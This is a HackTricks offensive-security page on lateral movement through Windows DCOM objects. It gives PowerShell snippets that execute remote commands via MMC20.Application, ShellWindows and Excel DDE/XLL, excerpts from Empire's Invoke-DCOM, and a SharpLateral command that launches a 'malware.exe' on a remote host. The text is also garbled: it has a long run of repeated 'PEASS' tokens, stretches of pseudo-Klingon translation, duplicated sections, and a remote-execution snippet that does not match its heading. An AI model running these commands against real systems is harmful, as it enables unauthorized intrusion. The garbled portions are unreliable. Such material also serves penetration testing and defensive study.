hacktricks/windows-hardening/lateral-movement/dcom-exec.md

DCOM Exec

htARTE (HackTricks AWS Red Team Expert) ! qaStaHvIS htARTE (HackTricks AWS Red Team Expert)!

• qaStaHvIS carlospolop ? qaStaHvIS carlospolop ? qaStaHvIS carlospolop PEASS qaStaHvIS carlospolop PDF qaStaHvIS carlospolop ? qaStaHvIS carlospolop PEASS qaStaHvIS carlospolop PEASS qaStaHvIS carlospolop PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS PEASS <

Get-CimInstance Win32_DCOMApplication

DCOM Exec

The COM object, MMC Application Class (MMC20.Application), enables scripting of MMC snap-in operations. Notably, this object contains a ExecuteShellCommand method under Document.ActiveView. More information about this method can be found here. Check it running:

This feature facilitates the execution of commands over a network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be utilized as follows:

[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))

Check methods:

1. DCOM (Distributed Component Object Model) is a protocol that allows software components to communicate across a network. It is used for remote procedure calls (RPC) between Windows machines. DCOM can be used for lateral movement in a network.

2. ExecuteShellCommand is a method that can be invoked on a COM object to execute a shell command on the remote host. This method allows an attacker to run arbitrary commands on the target machine.

3. Remote host refers to the target machine that the attacker wants to compromise or gain access to.

4. Process execution involves running a command or program on the remote host. This can be used by an attacker to perform various actions, such as running malicious scripts, installing backdoors, or executing other hacking techniques.

By understanding these methods, an attacker can leverage DCOM and the ExecuteShellCommand method to execute commands on a remote host and potentially gain unauthorized access to the target system.

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member

Get RCE:

ghItlh RCE:

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member

# Then just run something like:

ls \\10.10.10.10\c$\Users

ShellWindows & ShellBrowserWindow

For more info about this technique check the original post https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

The MMC20.Application object was identified to lack explicit "LaunchPermissions," defaulting to permissions that permit Administrators access. For further details, a thread can be explored here, and the usage of @tiraniddo’s OleView .NET for filtering objects without explicit Launch Permission is recommended.

Two specific objects, ShellBrowserWindow and ShellWindows, were highlighted due to their lack of explicit Launch Permissions. The absence of a LaunchPermission registry entry under HKCR:\AppID\{guid} signifies no explicit permissions.

ShellWindows

For ShellWindows, which lacks a ProgID, the .NET methods Type.GetTypeFromCLSID and Activator.CreateInstance facilitate object instantiation using its AppID. This process leverages OleView .NET to retrieve the CLSID for ShellWindows. Once instantiated, interaction is possible through the WindowsShell.Item method, leading to method invocation like Document.Application.ShellExecute.

Example PowerShell commands were provided to instantiate the object and execute commands remotely:

$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)

Lateral Movement with Excel DCOM Objects

Lateral movement can be achieved by exploiting DCOM Excel objects. For detailed information, it's advisable to read the discussion on leveraging Excel DDE for lateral movement via DCOM at Cybereason's blog.

The Empire project provides a PowerShell script, which demonstrates the utilization of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available on Empire's GitHub repository, showcasing different methods to abuse Excel for RCE:

Excel DCOM-Objects jImej

DCOM Excel jImej jImejtaHvISbe'chugh jImej. jImej DCOM Excel DDE jImejtaHvISbe'chugh vItlhutlhlaHbe'lu'pu' Cybereason's blog yIlo' blog Daq yIlo'lu'.

Empire project PowerShell script jImej, DCOM jImejtaHvISbe'chugh Excel RCE (remote code execution) jImejtaHvISbe'chugh vItlhutlhlaHbe'lu'pu' jImej. Empire's GitHub repository yIlo' repository Daq jImejtaHvISbe'chugh Excel RCE jImejtaHvISbe'chugh vItlhutlhlaHbe'lu'pu' jImej:

# Detection of Office version
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$isx64 = [boolean]$obj.Application.ProductCode[21]
Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
# Registration of an XLL
elseif ($Method -Match "RegisterXLL") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$obj.Application.RegisterXLL("$DllPath")
}
# Execution of a command via Excel DDE
elseif ($Method -Match "ExcelDDE") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$Obj.DisplayAlerts = $false
$Obj.DDEInitiate("cmd", "/c $Command")
}

Automation Tools for Lateral Movement

Two tools are highlighted for automating these techniques:

• Invoke-DCOM.ps1: A PowerShell script provided by the Empire project that simplifies the invocation of different methods for executing code on remote machines. This script is accessible at the Empire GitHub repository.

• SharpLateral: A tool designed for executing code remotely, which can be used with the command:

SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe

Automatic Tools

• The Powershell script Invoke-DCOM.ps1 allows to easily invoke all the commented ways to execute code in other machines.
• You could also use SharpLateral:

SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe

References

• https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
• https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.